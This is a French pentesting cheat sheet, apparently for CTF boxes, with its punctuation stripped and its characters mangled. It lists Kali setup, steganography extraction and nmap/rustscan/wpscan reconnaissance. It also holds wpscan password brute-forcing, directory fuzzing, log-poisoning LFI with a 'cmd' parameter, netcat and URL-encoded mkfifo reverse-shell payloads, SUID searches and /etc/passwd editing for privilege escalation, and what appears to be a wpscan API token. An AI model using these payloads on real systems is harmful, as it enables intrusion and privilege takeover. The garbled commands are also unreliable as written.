Comande kali virtualbox langue L 'fr' sudo sed -i 's XKBLAYOUT w XKBLAYOUT ' L' g' etc default keyboard regler le shell python -c 'import pty pty spawn bin bash ' export TERM xterm cewl http sort Bureau fsocity dic uniq passwords txt w suprimer d oublons

virtualbox langue L 'fr' sudo sed -i 's XKBLAYOUT w XKBLAYOUT ' L' g' etc default keyboard regler le shell python -c 'import pty pty spawn bin bash ' export TERM xterm cewl http sort Bureau fsocity dic uniq passwords txt w suprimer d oublons ?chjier wc -l passwords txt PHOTO phptp exif photo png pour info cacher dans dans phptp exiftool photo png pour info cacher strings -n photo png vois des pour info cacher dans phptp si on steghide extact -sf photo png pour info cacher dans phptp strings root Bureau photo png cacher dans phptp pour info steghide extract -sf root Bureau cute-alien jpg recuperer ?chier chacher binwalk -e root Bureau cutie png extrait dossier Chash-identi ?er ef bb b c db f RECONNAISSSANCE NMAP vulscan nmap -sV -Pn --script vulscan vulscan nse installer script vulscan github git clone https github com scipag vulscan scipagvulscan ln -s pwd scipagvulscan usr share nmap scripts vulscan rustscan -a --ulimit rustscan -b -T rustscan -a -p -- -sV nmap -vvv -p nmap -A -sV -T WPSCAN cherche vulnerability wpscan --api- token sebaXa um LFrOnAI pTZH RxfVMx rf NOCqz fAtU --url http blog -e p --plugins-detection aggressive wpscan --url -e u repertoire normale wpscan --url blog --wp-content-dir http wp-content speci ?er repetoire wpscan --url -- wp-content-dir http wp-content -e u enumerate user Cwpscan --url http blog wp-login php -U users txt -P root rockyou txt crack mot de passe sans autre repertoire wpscan -- url http blog --wp-content-dir http wpcontent -U users txt -P root directoryonlyone small txt crack mot de passe pour le shell trouver la page editer la page avec le php et l executer avec le lien d la page activer netcat wpscan --api- token sebaXa um LFrOnAI pTZH RxfVMx rf NOCqz fAtU --url http blog -e p --plugins-detection aggressive trouve vulnerability DIBUSTER GOBUSTER NIKTO DIRSEARCH wfuzz ?uf ?uf -u http FUZZ -w usr share wordlists dirbuster directory-list - medium txt gobuster dir -u http -x html txt php bak --wordlist usr share wordlists dirb common txt rustscan -a dirb http nikto -h dirseach http wfuzz --hc -z ?le usr share wordlists dirbuster directory- list- -medium txt http FUZZ wfuzz -u http secret evil php FUZZ etc passwd -w usr share wordlists rockyou txt --hw http blog-post archives randylogs enumerer workgroup info sudo enum linux -a tee enum linux log ls -la faille php ouvrir netcat nc -e bin sh Chttp blog-post archives randylogs php ?le var log auth log cmd encoder url sur le site https www urlencoder org resulat ceci est un payload http blog-post archives randylogs php ?le var log auth log cmd rm Ftmp Ff Bmk ?fo Ftmp Ff Bcat Ftmp Ff C Fbin Fsh - i E Cnc E Ftmp Ff ESCALATION PRIVILEGGE TROUVER FICHIER PERMITION ?nd -user root -perm - -print dev null INVITE DE COMMANDE sudo -l su nom machine ne marche pas faire python -c 'import pty pty spawn bin bash ' etc passwd si on peux ecrire nano etc

Documents similaires
  • 31
  • 0
  • 0
Afficher les détails des licences
Licence et utilisation
Gratuit pour un usage personnel Attribution requise
Partager
  • Détails
  • Publié le Dec 08, 2021
  • Catégorie Administration
  • Langue French
  • Taille du fichier 56.8kB